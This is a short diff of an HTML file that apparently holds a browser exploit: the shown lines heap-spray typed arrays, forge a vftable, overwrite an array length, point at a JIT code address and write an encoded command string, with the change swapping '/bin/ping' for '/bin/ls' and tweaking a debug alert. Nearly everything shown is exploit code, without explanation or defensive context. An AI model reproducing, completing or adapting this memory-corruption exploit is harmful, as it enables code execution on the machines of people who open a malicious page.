--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start66");
+alert("start666");
 var flag=prompt("flag");
 if(flag!=0){
  
@@ -165,7 +165,7 @@ spray[spray_index][typedarray_index]=vftable;
 spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
 spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x18;//addr;
 spray[spray_index][typedarray_index+0x40/4]=0x6E69622F;// /bin/ping
-spray[spray_index][typedarray_index+0x44/4]=0x6E69702F;
+spray[spray_index][typedarray_index+0x44/4]=0x00736C2F;//0x6E69702F;
 spray[spray_index][typedarray_index+0x48/4]=0x00000067;
 spray[spray_index][typedarray_index+0x60/4]=0x500000a0;
 spray[spray_index][typedarray_index+0x64/4]=0;
